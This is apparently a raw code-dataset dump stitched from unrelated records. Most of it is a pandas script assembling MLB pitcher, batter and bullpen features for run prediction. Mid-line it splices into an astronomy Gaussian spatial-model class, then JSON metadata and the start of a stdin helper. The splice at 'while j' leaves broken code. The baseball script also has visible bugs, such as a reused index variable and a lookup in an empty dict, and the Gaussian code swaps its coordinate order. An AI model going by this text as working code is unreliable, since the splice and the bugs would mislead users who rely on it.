v.items():\r\n team_ini = game_pitcher_stats_dict[k]['Team_Bat']\r\n if game_pitcher_stats_dict[k]['pitcher_hand'] == 'L' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'AL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'AL':\r\n team_means[team_ini] = team_mean_left[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'R' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'AL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'AL':\r\n team_means[team_ini] = team_mean_right[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'L' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'NL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'AL':\r\n team_means[team_ini] = team_mean_left_alt[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'R' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'AL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'NL':\r\n team_means[team_ini] = team_mean_right_alt[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'L' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'NL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'NL':\r\n team_means[team_ini] = team_mean_left[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'R' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'NL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'NL':\r\n team_means[team_ini] = team_mean_right[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'L' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'AL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'NL':\r\n team_means[team_ini] = team_mean_left_alt[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'R' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'NL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'AL':\r\n team_means[team_ini] = team_mean_right_alt[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n\r\n\r\ngame_logs = pd.DataFrame(list(game_pitcher_batter_stats_dict.values()), columns = list(list(game_pitcher_batter_stats_dict.values())[0].keys()))\r\ngame_logs['pitcher_BASES_VS_AB'] = list(map((lambda x:round(float(x),2)), game_logs['pitcher_BASES_VS_AB']))\r\ngame_logs['pitcher_hit_mult'] = list(map((lambda x:round(float(x),2)), game_logs['pitcher_hit_mult']))\r\ngame_logs['Expected_Runs'][287] = float(3.0)\r\ngame_logs['Expected_Runs'] = game_logs['Expected_Runs'].astype(float)\r\ngame_logs = game_logs.groupby(game_logs.columns, axis = 1).transform(lambda x: x.fillna(x.mean()))\r\n\r\n\r\nind = []\r\nfor i in range(16,33):\r\n ind.append(i)\r\nind1 = [] \r\nfor i in range(35,51):\r\n ind1.append(i)\r\nind2 = [4,6,7,8]+ind+ind1\r\n\r\nfor i in ind2:\r\n game_logs.iloc[:, i] = game_logs.iloc[:, i].astype(float)\r\n\r\ny = game_logs['Runs'].astype(int)\r\nX = game_logs.iloc[:,ind2]\r\n\r\n\r\nfrom constant_variables import PLAYERS\r\ndef get_team_player(player_name):\r\n for player, name in PLAYERS.items():\r\n if player == player_name:\r\n #player_name = name\r\n return name\r\n break\r\n return player_name\r\n \r\n \r\n \r\ndaily_lineups = daily_lineups_pitch()\r\nunknown, logs = [], []\r\nfor d in game_logs['Date'].unique():\r\n for k,v in daily_lineups[d].items():\r\n for k1,v1 in v.items():\r\n if len(list(game_logs['pitcher_hand'][game_logs['Team_Bat']==k][game_logs['Date']==d]))>0 and list(game_logs['pitcher_hand'][game_logs['Team_Bat']==k][game_logs['Date']==d])[0] == 'R':\r\n try:\r\n daily_lineups[d][k][k1] = player_dict_stats_right[k1.upper()]\r\n except KeyError:\r\n try:\r\n logs.append(['RIGHT0:' + d,k,k1])\r\n k2 = get_team_player(k1)\r\n #daily_lineups[d][k][k2] = daily_lineups[d][k].pop(k1, None)\r\n daily_lineups[d][k][k1] = player_dict_stats_right[k2.upper()]\r\n logs.append(['RIGHT:' + d,k,k1,k2])\r\n except KeyError:\r\n unknown.append(k1)\r\n logs.append(['RIGHT1:' + d,k,k1,k2])\r\n else:\r\n try:\r\n daily_lineups[d][k][k1] = player_dict_stats_left[k1.upper()]\r\n except KeyError:\r\n try:\r\n logs.append(['LEFT0:' + d,k,k1])\r\n k2 = get_team_player(k1)\r\n #daily_lineups[d][k][k2] = daily_lineups[d][k].pop(k1, None)\r\n daily_lineups[d][k][k1] = player_dict_stats_left[k2.upper()]\r\n logs.append(['LEFT:' + d,k,k1,k2])\r\n except KeyError:\r\n unknown.append(k1)\r\n logs.append(['LEFT1:' + d,k,k1,k2])\r\nunknown_uniq = []\r\nfor un in unknown:\r\n if un not in unknown_uniq:\r\n unknown_uniq.append(un)\r\n\r\nunknown_info = []\r\nfor k,v in daily_lineups.items():\r\n for k1,v1 in v.items():\r\n for k2,v2 in v1.items():\r\n if k2 in unknown_uniq:\r\n unknown_info.append([k,k1,k2])\r\n\r\nfor un in unknown_info: \r\n daily_lineups[un[0]][un[1]].pop(un[2], None)\r\n \r\n\r\ndaily_lineups_mean, daily_lineups_mean1, day, list_team, list_team_mean, list_mean, dates, list_teams = {}, {}, {}, [], [], [], [], []\r\nfor k,v in daily_lineups.items():\r\n for k1,v1 in v.items():\r\n for k2,v2 in v1.items():\r\n list_team.append(list(v2.values())[9:])\r\n hitters_game = pd.DataFrame(np.column_stack([list_team]), columns = list(v2.keys())[9:], dtype = float)\r\n daily_lineups_mean[k + ' ' + k1] = hitters_game.mean()\r\n for lk, lv in zip(list(v2.keys())[9:], list(hitters_game.mean())):\r\n day[lk] = lv\r\n daily_lineups_mean1[k + ' ' + k1] = day\r\n list_team, list_mean, list_teams, day = [], [], [], {}\r\n \r\n \r\ngame_pit_bat_lineup_dic = {} \r\nfor k,v in game_pitcher_batter_stats_dict.items():\r\n if k in daily_lineups_mean1.keys():\r\n game_pit_bat_lineup_dic[k] = {**game_pitcher_batter_stats_dict[k], **daily_lineups_mean1[k]}\r\n\r\ncol_game = ['bat_SO_R',\r\n 'bat_RBI_R',\r\n 'bat_DP_R',\r\n 'bat_FB%_R',\r\n 'bat_GB%_R',\r\n 'bat_LD%_R',\r\n 'bat_POP%_R',\r\n 'bat_ISO_R',\r\n 'bat_AVG_R',\r\n 'bat_OBP_R',\r\n 'bat_SLG_R',\r\n 'bat_TAV_R',\r\n 'batter_BASES_VS_AB_R',\r\n 'hit_mult_R',\r\n 'bat_SO_L',\r\n 'bat_RBI_L',\r\n 'bat_DP_L',\r\n 'bat_FB%_L',\r\n 'bat_GB%_L',\r\n 'bat_LD%_L',\r\n 'bat_POP%_L',\r\n 'bat_ISO_L',\r\n 'bat_AVG_L',\r\n 'bat_OBP_L',\r\n 'bat_SLG_L',\r\n 'bat_TAV_L',\r\n 'batter_BASES_VS_AB_L',\r\n 'hit_mult_L']\r\n\r\ncol_new = ['bat_SO',\r\n 'bat_RBI',\r\n 'bat_DP',\r\n 'bat_FB%',\r\n 'bat_GB%',\r\n 'bat_LD%',\r\n 'bat_POP%',\r\n 'bat_ISO',\r\n 'bat_AVG',\r\n 'bat_OBP',\r\n 'bat_SLG',\r\n 'bat_TAV',\r\n 'batter_BASES_VS_AB',\r\n 'hit_mult',\r\n 'bat_SO',\r\n 'bat_RBI',\r\n 'bat_DP',\r\n 'bat_FB%',\r\n 'bat_GB%',\r\n 'bat_LD%',\r\n 'bat_POP%',\r\n 'bat_ISO',\r\n 'bat_AVG',\r\n 'bat_OBP',\r\n 'bat_SLG',\r\n 'bat_TAV',\r\n 'batter_BASES_VS_AB',\r\n 'hit_mult']\r\n\r\ncol_new1 = ['bat_SO',\r\n 'bat_RBI',\r\n 'bat_DP',\r\n 'bat_FB%',\r\n 'bat_GB%',\r\n 'bat_LD%',\r\n 'bat_POP%',\r\n 'bat_ISO',\r\n 'bat_AVG',\r\n 'bat_OBP',\r\n 'bat_SLG',\r\n 'bat_TAV',\r\n 'batter_BASES_VS_AB',\r\n 'hit_mult']\r\n\r\ngame_pit_bat_lineup_dic2, new_dict = {}, {}\r\nfor k,v in game_pit_bat_lineup_dic.items():\r\n for k1,v1 in v.items():\r\n if k1 in col_game:\r\n ind = col_game.index(k1)\r\n new_dict[col_new[ind]] = game_pit_bat_lineup_dic[k][k1]\r\n else:\r\n new_dict[k1] = game_pit_bat_lineup_dic[k][k1]\r\n game_pit_bat_lineup_dic2[k] = new_dict\r\n new_dict = {}\r\n \r\ngame_pit_bat_lineup_dic1 = game_pit_bat_lineup_dic\r\n\r\ngame_logs1 = pd.DataFrame(list(game_pit_bat_lineup_dic2.values()), columns = list(list(game_pit_bat_lineup_dic2.values())[0].keys()))\r\n'''game_logs['pitcher_BASES_VS_AB'] = list(map((lambda x:round(float(x),2)), game_logs['pitcher_BASES_VS_AB']))\r\ngame_logs['pitcher_hit_mult'] = list(map((lambda x:round(float(x),2)), game_logs['pitcher_hit_mult']))\r\ngame_logs['Expected_Runs'][287] = float(3.0)\r\ngame_logs['Expected_Runs'] = game_logs['Expected_Runs'].astype(float)'''\r\n\r\ndef game_nan_index(column):\r\n indicies = []\r\n col_list = list(column.values)\r\n for i,game in enumerate(col_list): \r\n if game == 'nan':\r\n indicies.append(i)\r\n return indicies\r\n \r\ninde1 = game_nan_index(game_logs1['Expected_Runs'])\r\ngame_logs1['Expected_Runs'][inde1] = float(3.5)\r\n##game_logs1 = game_logs1.groupby(game_logs1.columns, axis = 1).transform(lambda x: x.fillna(x.mean()))\r\n\r\n\r\nind = []\r\nfor i in range(17,33):\r\n ind.append(i)\r\nind1 = [] \r\nfor i in range(36,66):\r\n ind1.append(i)\r\nind2 = [4,6,7,8]+ind+ind1\r\n\r\nfor i in ind2:\r\n game_logs1.iloc[:, i] = game_logs1.iloc[:, i].astype(float)\r\n game_logs1.iloc[:, i] = round(game_logs1.iloc[:, i],2)\r\n\r\ny = game_logs1['Runs'].astype(int)\r\nX = game_logs1.iloc[:,ind2]\r\n \r\n\r\ndf4 = pd.read_csv(\"MLB/pitcher_vs_side.csv\", encoding='latin-1')\r\ndf4 = df4.iloc[:,1:]\r\n\r\nfrom constant_variables import pit_side_col_list\r\npitcher_side_frame = Players(data = df4, \r\n column_names = pit_side_col_list,\r\n column_titles = pit_side_col_list)\r\n\r\n\r\n# Create Instance from Class\r\npitcher_side_frames = pitcher_side_frame.create_df()\r\n\r\n# Create Dictionary from Data\r\npitcher_side_dic = pitcher_side_frame.create_dict('NAME')\r\npitcher_side_dict_tot = pitcher_side_dic[1]\r\npitcher_side_dict_stats = pitcher_side_dic[2]\r\n\r\ntest = []\r\ndaily_lineups_mean_pit, daily_lineups_mean1_pit, day_pit, list_team_pit, list_team_mean_pit, list_mean_pit, dates_pit, list_teams_pit = {}, {}, {}, [], [], [], [], []\r\nfor k,v in daily_lineups.items():\r\n for k1,v1 in v.items():\r\n for k2,v2 in v1.items():\r\n try: \r\n team_pit = game_pitcher_batter_stats_dict[k + ' ' + k1]['Team_Pitch']\r\n hand_pit = game_pitcher_batter_stats_dict[k + ' ' + k1]['pitcher_hand']\r\n except KeyError:\r\n break\r\n bat_hand = list(v2.values())[3]\r\n if bat_hand == 'S' and hand_pit == 'L':\r\n bat_hand = 'R'\r\n elif bat_hand == 'S' and hand_pit == 'R':\r\n bat_hand = 'L'\r\n if team_pit.upper() in list(pitcher_side_frames['NAME']) and pitcher_side_frames.iloc[:,5:][pitcher_side_frames['NAME']==team_pit][pitcher_side_frames['HAND_pit']==bat_hand].empty == False:\r\n list_team_pit.append(pitcher_side_frames.iloc[:,5:][pitcher_side_frames['NAME']==team_pit][pitcher_side_frames['HAND_pit']==bat_hand])\r\n dates_pit.append(team_pit)\r\n else:\r\n test.append([team_pit, bat_hand, k2, k1, k, bat_hand])\r\n if len(list_team_pit) > 0:\r\n pitchers_game = pd.DataFrame(pd.concat([li for li in list_team_pit]), columns = list(pitcher_side_frames.iloc[:,5:].columns), dtype = float)\r\n daily_lineups_mean_pit[k + ' ' + k1] = pitchers_game.mean()\r\n # moved forward 1 tab\r\n for lk, lv in zip(list(pitcher_side_frames.iloc[:,5:].columns), list(pitchers_game.mean())):\r\n day_pit[lk] = lv\r\n daily_lineups_mean1_pit[k + ' ' + k1] = day_pit\r\n list_team_pit, list_mean_pit, list_teams_pit, day_pit = [], [], [], {}\r\n \r\ngame_pitcher_bat_lineup_dic = {} \r\nfor k,v in game_pit_bat_lineup_dic2.items():\r\n if k in daily_lineups_mean1_pit.keys():\r\n game_pitcher_bat_lineup_dic[k] = {**game_pit_bat_lineup_dic2[k], **daily_lineups_mean1_pit[k]}\r\n\r\ndf4 = pd.read_csv(\"MLB/bullpen.csv\", encoding='latin-1')\r\nbull = {}\r\ngame_pitcher_bat_lineup_dic1 = game_pitcher_bat_lineup_dic\r\n#game_pitcher_bat_lineup_dic = game_pitcher_bat_lineup_dic1\r\ngame_pitcher_bat_lineup_bullpen_dic = {} \r\nfor k,v in game_pitcher_bat_lineup_dic.items():\r\n pitcher = v['Team_Pitch']\r\n team = v['team_ini']\r\n for col in list(df4.columns[1:-1]):\r\n ratio = df2['G_Pitching_Std'][df2['mlb_name'] == pitcher].values[0]\r\n #bull[col] = df4[col][df4['Team_Ini']==team].values[0]\r\n game_pitcher_bat_lineup_dic[k][col] = df4[col][df4['Team_Ini']==team].values[0]*ratio\r\n\r\ngame_logs2 = pd.DataFrame(list(game_pitcher_bat_lineup_dic.values()), columns = list(list(game_pitcher_bat_lineup_dic.values())[0].keys()))\r\n\r\ndef game_nan_index(column):\r\n indicies = []\r\n col_list = list(column.values)\r\n for i,game in enumerate(col_list): \r\n if game == 'nan':\r\n indicies.append(i)\r\n return indicies\r\n \r\ninde2 = game_nan_index(game_logs2['Expected_Runs'])\r\ngame_logs2['Expected_Runs'][inde1] = float(3.5)\r\n\r\n\r\nind = []\r\nfor i in range(17,34):\r\n ind.append(i)\r\nind1 = [] \r\nfor i in range(36,110):\r\n ind1.append(i)\r\nind2 = [4,6,7,8]+ind+ind1\r\n\r\nfor i in ind2:\r\n game_logs2.iloc[:, i] = game_logs2.iloc[:, i].astype(float)\r\n game_logs2.iloc[:, i] = round(game_logs2.iloc[:, i],2)\r\n\r\ny = game_logs2['Runs'].astype(int)\r\nX = game_logs2.iloc[:,ind2]\r\nX1 = game_logs2.iloc[:,[1]+ind2]\r\n\r\nX.to_csv(\"C:/Users/mrcrb/PythonScripts/MLB/MLB/X_sort.csv\", sep=',', encoding='utf-8', index=False)\r\ny.to_csv(\"C:/Users/mrcrb/PythonScripts/MLB/MLB/y_sort.csv\", sep=',', encoding='utf-8', index=False)\r\nX1.to_csv(\"C:/Users/mrcrb/PythonScripts/MLB/MLB/X1_sort.csv\", sep=',', encoding='utf-8', index=False)\r\n\r\n\r\n# Compiling future game data that will be predicted\r\ndf5 = pd.read_csv(\"MLB/future_games.csv\", encoding='latin-1')\r\nones = pd.DataFrame(np.ones((len(df5),12)), columns = ['pitcher_IP', 'pitcher_PA', 'pitcher_SO', 'pitcher_DRA', 'pitcher_ERA', 'pitcher_PPF', 'pitcher_VORP', 'pitcher_FIP', 'pitcher_PVORP', 'pitcher_PWARP', 'pitcher_BASES_VS_AB', 'pitcher_hit_mult'])\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\nfor d in df5['Pitcher']:\r\n for i in ['pitcher_IP', 'pitcher_PA', 'pitcher_SO', 'pitcher_DRA', 'pitcher_ERA', 'pitcher_PPF', 'pitcher_VORP', 'pitcher_FIP', 'pitcher_PVORP', 'pitcher_PWARP', 'pitcher_BASES_VS_AB', 'pitcher_hit_mult']:\r\n df5[i][df5['Pitcher']==d] = float(game_logs2[i][game_logs2['Team_Pitch'] == d.upper()].values[0])\r\n \r\n\r\n\r\nd_eff = ['def_H', 'def_HR',\t'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%']\r\nones = pd.DataFrame(np.ones((16,len(d_eff))), columns = ['def_H', 'def_HR',\t'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%'])\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\ndf5['team_ini'] = df5['def_H']\r\n\r\nfor tm in df5['Team']:\r\n df5['team_ini'][df5['Team']==tm] = game_logs2['Stadium'][game_logs2['team']==tm].values[0]\r\n\r\n\r\ngl2 = game_logs2[['team_ini', 'def_H', 'def_HR', 'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%']]\r\n\r\nfor tm in df5['team_ini']:\r\n for i in ['def_H', 'def_HR', 'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%']:\r\n df5[i][df5['team_ini']==tm] = gl2[i][gl2['team_ini']==tm].values[0]\r\n\r\nfrom constant_variables import TEAMS\r\ndef get_team_ini(team_name):\r\n for name, ini in TEAMS.items():\r\n if name == team_name:\r\n return ini\r\n \r\ndf5['Team_Bat_Ini'] = [get_team_ini(x.upper()) for x in df5['Team_Bat']]\r\n\r\nbat_splits = ['bat_SO', 'bat_RBI', 'bat_DP', 'bat_FB%', 'bat_GB%', 'bat_LD%', 'bat_POP%', 'bat_ISO', 'bat_AVG', 'bat_OBP', 'bat_SLG', 'bat_TAV', 'batter_BASES_VS_AB',\t'hit_mult']\r\n\r\nones = pd.DataFrame(np.ones((16,len(bat_splits))), columns = ['bat_SO', 'bat_RBI', 'bat_DP', 'bat_FB%', 'bat_GB%', 'bat_LD%', 'bat_POP%', 'bat_ISO', 'bat_AVG', 'bat_OBP', 'bat_SLG', 'bat_TAV', 'batter_BASES_VS_AB',\t'hit_mult'])\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n'''\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in [ 'bat_SO', 'bat_RBI', 'bat_DP', 'bat_FB%', 'bat_GB%', 'bat_LD%', 'bat_POP%', 'bat_ISO', 'bat_AVG', 'bat_OBP', 'bat_SLG', 'bat_TAV', 'batter_BASES_VS_AB',\t'hit_mult']:\r\n df5[i][df5['Team_Bat_Ini']==tm][df5['Throws']==hd] = round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values.mean()),2)\r\n'''\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in [ 'bat_SO', 'bat_RBI', 'bat_DP', 'bat_FB%', 'bat_GB%', 'bat_LD%', 'bat_POP%', 'bat_ISO', 'bat_AVG', 'bat_OBP', 'bat_SLG', 'bat_TAV', 'batter_BASES_VS_AB',\t'hit_mult']:\r\n df5[i][df5['Team_Bat_Ini']==tm] = round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values.mean()),2)\r\n\r\n\r\n\r\ngl2 = game_logs2[['team_ini', 'def_H', 'def_HR', 'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%']]\r\n\r\nfor tm in df5['team_ini']:\r\n for i in ['def_H', 'def_HR', 'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%']:\r\n df5[i][df5['team_ini']==tm] = gl2[i][gl2['team_ini']==tm].values[0]\r\n\r\n\r\ntest, test2 = [], []\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in [ 'bat_SO', 'bat_RBI', 'bat_DP', 'bat_FB%', 'bat_GB%', 'bat_LD%', 'bat_POP%', 'bat_ISO', 'bat_AVG', 'bat_OBP', 'bat_SLG', 'bat_TAV', 'batter_BASES_VS_AB',\t'hit_mult']:\r\n test.append( round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values.mean()),2))\r\n test2.append([i,tm,hd])\r\n\r\n\r\nbat_split = ['G_batter', 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter', 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', 'BASES_VS_AB_batter', 'SDTHB_BAT']\r\nones = pd.DataFrame(np.ones((16,len(bat_split))), columns = ['G_batter', 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter', 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', 'BASES_VS_AB_batter', 'SDTHB_BAT'])\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\n\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in ['G_batter', 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter', 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', 'BASES_VS_AB_batter', 'SDTHB_BAT']:\r\n df5[i][df5['Team_Bat_Ini']==tm] = round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values[0]),2)\r\n\r\n'''\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in ['G_batter', 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter', 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', 'BASES_VS_AB_batter', 'SDTHB_BAT']:\r\n df5[i][df5['Team_Bat_Ini']==tm][df5['Throws']==hd] = round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values[0]),2)\r\n\r\n\r\nbatt, batt2 = [], []\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in ['G_batter', 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter', 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', 'BASES_VS_AB_batter', 'SDTHB_BAT']:\r\n batt.append( round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values.mean()),2))\r\n batt2.append(i)\r\n'''\r\n\r\ngame_logs2['team_ini'][game_logs2['Team_Pitch']=='MATT HARVEY'] = 'CIN'\r\n\r\nside_pit_cols = ['H_SIDE_pit', '1B_SIDE_pit', '2B_SIDE_pit', '3B_SIDE_pit', 'HR_SIDE_pit', 'TB_SIDE_pit', 'SO_SIDE_pit', 'BB_SIDE_pit', 'HBP_SIDE_pit', 'SF_SIDE_pit', 'SH_SIDE_pit', 'DP_SIDE_pit', 'FB%_SIDE_pit', 'GB%_SIDE_pit', 'LD%_SIDE_pit', 'POP%_SIDE_pit', 'ISO_SIDE_pit', 'AVG_SIDE_pit', 'OBP_SIDE_pit', 'SLG_SIDE_pit', 'TAV_SIDE_pit', 'DRA_SIDE_pit', 'DRA-_SIDE_pit', 'CFIP_SIDE_pit', 'BASES_VS_AB_pit']\r\nones = pd.DataFrame(np.ones((16,len(side_pit_cols))), columns = side_pit_cols)\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\nfor tm,hd in zip(df5['Pitcher'], df5['team_ini']):\r\n for i in side_pit_cols:\r\n df5[i][df5['Pitcher']==tm] = round(float(game_logs2[i][game_logs2['Team_Pitch']==tm.upper()][game_logs2['team_ini']==hd].values[0]),2)\r\n\r\n\r\n\r\nbullpen_cat = ['K/9', 'BB/9', 'K/BB', 'HR/9', 'K%', 'BB%', 'K-BB%', 'AVG', 'WHIP', 'BABIP', 'LOB%',\r\n 'ERA-', 'FIP-', 'xFIP-', 'ERA', 'FIP', 'E-F', 'xFIP', 'SIERA']\r\nones = pd.DataFrame(np.ones((16,len(bullpen_cat))), columns = bullpen_cat)\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\nfor tm,hd in zip(df5['Pitcher'], df5['team_ini']):\r\n for i in bullpen_cat:\r\n df5[i][df5['Pitcher']==tm] = round(float(game_logs2[i][game_logs2['Team_Pitch']==tm.upper()][game_logs2['team_ini']==hd].values[0]),2)\r\n\r\n\r\nmonster_cols = ['Expected_Runs', 'Temp', 'Humidity', 'Rain']\r\nones = pd.DataFrame(np.ones((16,len(bat_split))), columns = monster_cols)\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\nX_new = X[X.columns[list(X.columns).index('pitcher_SO'):]]\r\ndf5_new = df5[df5.columns[list(df5.columns).index('pitcher_SO'):]]\r\n\r\ndf5_new = df5_new.drop(['team_ini', 'Team_Bat_Ini', 'G_batter', 'PA_batter'], axis=1)\r\n\r\n\r\nX_new.to_csv(\"C:/Users/mrcrb/PythonScripts/MLB/MLB/X_new.csv\", sep=',', encoding='utf-8', index=False)\r\ndf5_new.to_csv(\"C:/Users/mrcrb/PythonScripts/MLB/MLB/df5_new.csv\", sep=',', encoding='utf-8', index=False)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nstats = {}\r\nfor i,j in zip(test2,test):\r\n if stats[i[0]] > 0:\r\n stats[i[0]]=[stats[i[0]],j]\r\n else:\r\n stats[i[0]]=j\r\n\r\ni,j=0,0\r\ntest3, test4= [],[]\r\nwhile j 89. or 2*maxSigma/np.cos(maxAbsDec*np.pi/180.) >= 180.:\n minRa = 0.\n maxRa = 360.\n else:\n minRa = self.parameters['RA0'].value - 2*maxSigma/np.cos(maxAbsDec*np.pi/180.)\n maxRa = self.parameters['RA0'].value + 2*maxSigma/np.cos(maxAbsDec*np.pi/180.)\n if minRa < 0.:\n minRa = minRa + 360.\n elif maxRa > 360.:\n maxRa = maxRa - 360.\n \n return minRa, maxRa, minDec, maxDec\n \n\n\nclass MultiVariateGaussian(SpatialModel):\n \n def setup(self):\n self.functionName = \"Multivariate Gaussian\"\n self.formula = r'$f(\\vec{x}) = \\left(\\frac{180^\\circ}{\\pi}\\right)^2 \\frac{1}{2\\pi \\sqrt{\\det{\\Sigma}}} \\, {\\rm exp}\\left( -\\frac{1}{2} (\\vec{x}-\\vec{x}_0)^\\intercal \\cdot \\Sigma^{-1}\\cdot (\\vec{x}-\\vec{x}_0)\\right) \\\\ \\vec{x}_0 = ({\\rm RA}_0,{\\rm Dec}_0)\\\\ \\Lambda = \\left( \\begin{array}{cc} \\sigma^2 & 0 \\\\ 0 & \\sigma^2 (1-e^2) \\end{array}\\right) \\\\ U = \\left( \\begin{array}{cc} \\cos \\theta & -\\sin \\theta \\\\ \\sin \\theta & cos \\theta \\end{array}\\right) \\\\\\Sigma = U\\Lambda U^\\intercal$'\n self.parameters = collections.OrderedDict()\n self.parameters['RA0'] = Parameter('RA0',1.,0,360,0.1,fixed=False,nuisance=False,dataset=None)\n self.parameters['Dec0'] = Parameter('Dec0',1.,-90,90,0.1,fixed=False,nuisance=False,dataset=None)\n self.parameters['sigma'] = SpatialParameter('sigma',0.1,0,10,0.01,fixed=False,nuisance=False,dataset=None)\n self.parameters['eccentricity'] = SpatialParameter('eccentricity',0.7,0,1,0.01,fixed=False,nuisance=False,dataset=None)\n self.parameters['angle'] = SpatialParameter('angle',0.,0,180,1.,fixed=False,nuisance=False,dataset=None)\n \n \n self.ncalls = 0\n \n \n def __call__(self,RA,Dec,energy):\n self.ncalls += 1\n RA0 = self.parameters['RA0'].value\n Dec0 = self.parameters['Dec0'].value\n sigma = self.parameters['sigma'].getValue(energy)\n eccentricity = self.parameters['eccentricity'].getValue(energy)\n angle = np.deg2rad(self.parameters['angle'].getValue(energy))\n \n \n sigma1=sigma**2\n sigma2=sigma1*(1-eccentricity**2)\n rot=np.array([[np.cos(angle),-np.sin(angle)],[np.sin(angle),np.cos(angle)]])\n cov=np.dot(rot,np.dot(np.array([[sigma1,0],[0,sigma2]]),rot.T))\n return np.maximum(np.power(180/np.pi,2)*scipy.stats.multivariate_normal.pdf(np.array([Dec,RA]).T, mean=np.array([RA0,Dec0]), cov=cov), 1e-30)\n \n def integratedFlux(self,energy):\n \n return 1.\n\n\n\n \n\n","sub_path":"threeML/models/spatialModels/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"276402325","text":"\nimport sys, math\ndef rs():\n return sys.stdin.readline().strip()\ndef ri():\n return int(sys.stdin.readline().strip())\ndef ras():\n return list(sys.stdin.readline().strip())\ndef rai():\n return map(int,sys.stdin.readline().strip().split())\ndef raf():\n return map(float,sys.stdin.readline().strip().split())\n\n\ndef 